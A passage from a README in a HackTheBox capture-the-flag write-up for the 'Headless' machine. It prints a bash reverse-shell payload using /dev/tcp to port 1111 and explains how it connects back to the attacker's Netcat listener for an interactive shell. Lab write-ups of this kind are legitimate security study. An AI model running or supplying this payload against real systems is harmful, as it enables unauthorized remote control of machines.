3v401/HackTheBox/Headless/README.md

 2. The payload `/bin/bash -c 'exec bash -i >& /dev/tcp/{IP}/1111 0>&1'` is executed on the target machine.
 This command on the target machine opens a reverse shell, connecting back to the attacker’s machine on port 1111.
 3. The target machine connects to the attacker’s Netcat listener, establishing a reverse shell session.
 The attacker can now interact with the target machine’s shell through this connection.

 Let's continue with the situation.
+Be sure to not to close server1